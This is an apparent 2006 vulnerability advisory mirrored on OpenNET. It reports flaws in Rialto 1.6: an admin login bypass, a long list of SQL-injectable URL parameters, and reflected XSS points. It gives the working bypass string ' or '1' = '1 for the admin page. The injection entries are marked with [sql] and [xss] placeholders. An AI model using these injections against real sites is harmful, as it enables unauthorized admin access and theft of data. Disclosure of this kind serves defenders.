The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Rialto 1.6[admin login bypass & multiples injections sql]


<< Previous INDEX Search src / Print Next >>
Date: 20 Nov 2006 02:53:31 -0000
From: [email protected]
To: [email protected]
Subject: Rialto 1.6[admin login bypass & multiples injections sql]
X-Virus-Scanned: antivirus-gw at tyumen.ru

vendor site: http://www.grandora.com/
product : Rialto 1.6 
bug:multiples injection sql , login bypass , xss 
risk : high !




admin login bypass :
/admin/default.asp 
username:    ' or '1' = '1
passwd:      ' or '1' = '1

injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain.asp?ID='[sql]
/searchkey.asp?Keyword='[sql]
/searchmain.asp?I1=1&area='[sql]
/searchoption.asp?I12=1&cat='[sql]
/searchmain.asp?I1=1&area=all&cat='[sql]
/searchoption.asp?I12=1&cat=all&area='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]



xss get :
/listmain.asp?cat=[xss]
/searchkey.asp?Keyword=[xss]
/searchmain.asp?I1=1&area=all&cat=[xss]
/forminfo.asp?refno=[xss]



laurent gaffiИ & benjamin mossИ
http://s-a-p.ca/
contact: [email protected]


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру